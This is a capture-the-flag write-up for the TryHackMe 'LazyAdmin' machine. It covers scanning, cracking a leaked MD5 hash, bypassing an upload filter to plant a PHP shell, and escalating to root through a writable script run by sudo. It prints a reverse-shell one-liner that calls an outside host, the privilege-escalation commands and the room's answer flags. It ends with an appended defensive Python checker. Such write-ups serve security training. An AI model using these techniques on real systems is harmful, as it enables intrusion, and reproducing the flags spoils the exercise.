TryHackMe - LazyAdmin - Writeup

Nehru G
4 min read · May 26, 2021

TryHackMe — LazyAdmin

Have some fun! There might be multiple ways to get user access. This is real!!

NMAP — Network mapping

# Command: nmap -sT -vv -sC -sV 10.10.126.215

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCo0a0DBybd2oCUPGjhXN1BQrAhbKKJhN/PW2OCccDm6KB/+sH/2UWHy3kE1XDgWO2W3EEHVd6vf7SdrCt7sWhJSno/q1ICO6ZnHBCjyWcRMxojBvVtS4kOlzungcirIpPDxiDChZoy+ZdlC3hgnzS5ih/RstPbIy0uG7QI/K7wFzW7dqMlYw62CupjNHt/O16DlokjkzSdq9eyYwzef/CDRb5QnpkTX5iQcxyKiPzZVdX/W8pfP3VfLyd/cxBqvbtQcl3iT1n+QwL8+QArh01boMgWs6oIDxvPxvXoJ0Ts0pEQ2BFC9u7CgdvQz1p+VtuxdH6mu9YztRymXmXPKJfB
| 256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBC8TzxsGQ1Xtyg+XwisNmDmdsHKumQYqiUbxqVd+E0E0TdRaeIkSGov/GKoXY00EX2izJSImiJtn0j988XBOTFE=
| 256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILe/TbqqjC/bQMfBM29kV2xApQbhUXLFwFJPU14Y9/Nm
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Here, ports 22 (ssh) and 80 (http) are open.

HTTP

We can conclude that an HTTP service is running on the machine. Let's check that service and start enumerating it.

Enumeration

For enumeration we are going to find the hidden directories of the web server using our favorite tool, gobuster.

# Command: gobuster dir -u http://10.10.126.215 -w /usr/share/dirb/wordlists/common.txt -x txt,php

Here we found a hidden directory: /content

Again, we run gobuster against it to find more hidden directories.

# Command: gobuster dir -u http://10.10.126.215/content -w /usr/share/dirb/wordlists/common.txt -x txt,php

/images
/inc
/index.php

After the gobuster scan we found some interesting folders, and among them a really interesting one called /inc. Let's check what it has.

Here we find DB-related files; let's check the mysqlbackup folder. It contains a MySQL backup file, so let's download it and see whether it has any interesting information.

Here I found the credentials for login:

We found an MD5 hash: the username is manager and the password is stored as an MD5 hash. So let's use an online MD5 lookup, and with that I found the password.

Link: https://crackstation.net/

Try CrackStation.

Let's check the hidden directory /as and log in to the page.

We are on the admin page. Now let's try to upload our shell.

Navigate to Media -> Upload. I tried to upload the .php shell, but the website refused this extension. So change .php5 to .phtml and upload.

Click on shell.php5. Now start a listener on our machine, and we've got our shell.

# nc -lvnp <port>

User Flag

# cd /home
# ls
itguy
# cd itguy
# ls
# cat user.txt
THM{63e5bce9271952aad1113b6f1ac28a07}

Now let's try to get root. First we spawn a TTY using this Python one-liner:

# python -c 'import pty;pty.spawn("/bin/bash")'

Privilege Escalation

Then run sudo -l to check which commands we can run as root.

www-data@THM-Chal:/home/itguy$ sudo -l
sudo -l
Matching Defaults entries for www-data on THM-Chal:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
(ALL) NOPASSWD:
/usr/bin/perl /home/itguy/backup.pl

Well, we can run Perl on the file backup.pl without a password. Let's check the content of backup.pl.

www-data@THM-Chal:/home/itguy$ cat backup.pl
cat backup.pl
#!/usr/bin/perl

system("sh", "/etc/copy.sh");
www-data@THM-Chal:/home/itguy$ cat /etc/copy.sh
cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f

We won't try any reverse shell here; we just replace the command and execute it.

Root Flag

Let's check here: https://guif.re/linuxeop

www-data@THM-Chal:/home/itguy$ cd /etc
cd /etc
www-data@THM-Chal:/etc$
echo 'exec "/bin/sh"' > copy.sh
echo 'exec "/bin/sh"' > copy.sh
www-data@THM-Chal:/etc$ sudo /usr/bin/perl /home/itguy/backup.pl
sudo /usr/bin/perl /home/itguy/backup.pl
# whoami
whoami
root
# cd /root
cd /root
# cat root.txt
cat root.txt
THM{6637f41d0177b6f37cb20d775124699f}
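The root path above works because a sudo rule lets www-data run a script as root without a password, and that script in turn executes /etc/copy.sh, a file www-data can overwrite. As an added example (not part of the original writeup), here is a small Python auditor that flags exactly this pattern: it follows a sudoers rule through the command, its script argument and the scripts they call, and reports every file the granted user can modify. The sudoers line, file modes and call graph are a constructed snapshot that mirrors the box; nothing is read from a live system.

```python
import re
import stat

# Constructed snapshot mirroring the box: the sudo rule, file ownership/modes,
# and which scripts call which. Hypothetical values, not read from a live host.
SUDOERS_RULE = "www-data ALL=(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl"

FILES = {  # path -> (owner, group, mode)
    "/usr/bin/perl": ("root", "root", 0o755),
    "/home/itguy/backup.pl": ("itguy", "itguy", 0o644),
    "/etc/copy.sh": ("root", "root", 0o666),  # world-writable: the flaw
}
CALLS = {"/home/itguy/backup.pl": ["/etc/copy.sh"]}  # from `cat backup.pl`

# Hardened variant of the same snapshot: copy.sh is no longer world-writable.
FILES_FIXED = dict(FILES, **{"/etc/copy.sh": ("root", "root", 0o644)})


def writable_by(path, user, groups, files):
    """True if `user` (member of `groups`) can write `path` per its mode bits."""
    owner, group, mode = files[path]
    if user == owner and mode & stat.S_IWUSR:
        return True
    if group in groups and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)


def audit_rule(rule, user, groups=(), files=FILES, calls=CALLS):
    """Return every path reachable from a sudoers rule that `user` can modify.

    Any hit means `user` can change what runs as root without a password.
    """
    m = re.match(r"(\S+)\s+\S+=\((.*?)\)\s*(NOPASSWD:)?\s*(.*)", rule)
    if not m or m.group(1) != user:
        return []  # rule does not apply to this user
    queue = [tok for tok in m.group(4).split() if tok.startswith("/")]
    seen, findings = set(), []
    while queue:  # follow the command, its script argument, and callees
        path = queue.pop()
        if path in seen or path not in files:
            continue
        seen.add(path)
        if writable_by(path, user, groups, files):
            findings.append(path)
        queue.extend(calls.get(path, []))
    return sorted(findings)


if __name__ == "__main__":
    print(audit_rule(SUDOERS_RULE, "www-data"))  # ['/etc/copy.sh']
```

On a real host the same check would read the modes with os.stat and the callees from the script text; the fix the auditor points at is simply making /etc/copy.sh root-owned and not writable by others.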
